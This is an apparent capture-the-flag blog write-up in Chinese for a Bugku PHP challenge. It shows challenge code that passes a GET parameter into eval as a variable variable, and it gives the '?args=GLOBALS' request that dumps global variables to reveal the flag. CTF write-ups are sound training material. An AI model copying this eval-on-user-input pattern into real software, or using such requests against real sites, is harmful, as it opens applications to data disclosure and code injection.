Bugku-CTF之变量1
Day9
变量1
http://123.206.87.240:8004/index1.php
本题要点:正则表达式、可变变量、全局变量
对代码的解释:
<?php
error_reporting(0); // 关闭php错误显示
include "flag1.php"; // 引入flag1.php文件代码
highlight_file(__file__);
if(isset($_GET['args'])){ // 通过get方式传递 args变量才能执行if里面的代码
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){ // 正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成
die("args error!");
}
eval("var_dump($$args);");
}
?>
介绍一下可变变量
具体详情见:
https://www.php.net/manual/zh/language.variables.variable.php
所以我们只需给变量传一个全局数组变量就好了 所以我们构造 ?args=GLOBALS加到url后面
http://120.24.86.145:8004/index1.php?args=GLOBALS
注:此处全局变量的GLOBALS必须为大写!!!!
便可得到FLAG
完成!
参考资料:
https://www.php.net/manual/zh/language.variables.variable.php
--------------------- ┑( ̄Д  ̄)┍ --------------------------
作者:0yst3r[一只在安全领域努力奋斗的小菜鸡]
来源:博客园[ https://www.cnblogs.com/0yst3r-2046/ ] 引用时请注明来源哦~
(๑•̀ㅂ•́)و✧ヽ(✿゚▽゚)ノ(*^▽^*) φ(≧ω≦*)♪
如果本文对你有用,本人不胜欢喜。
The world is your oyster.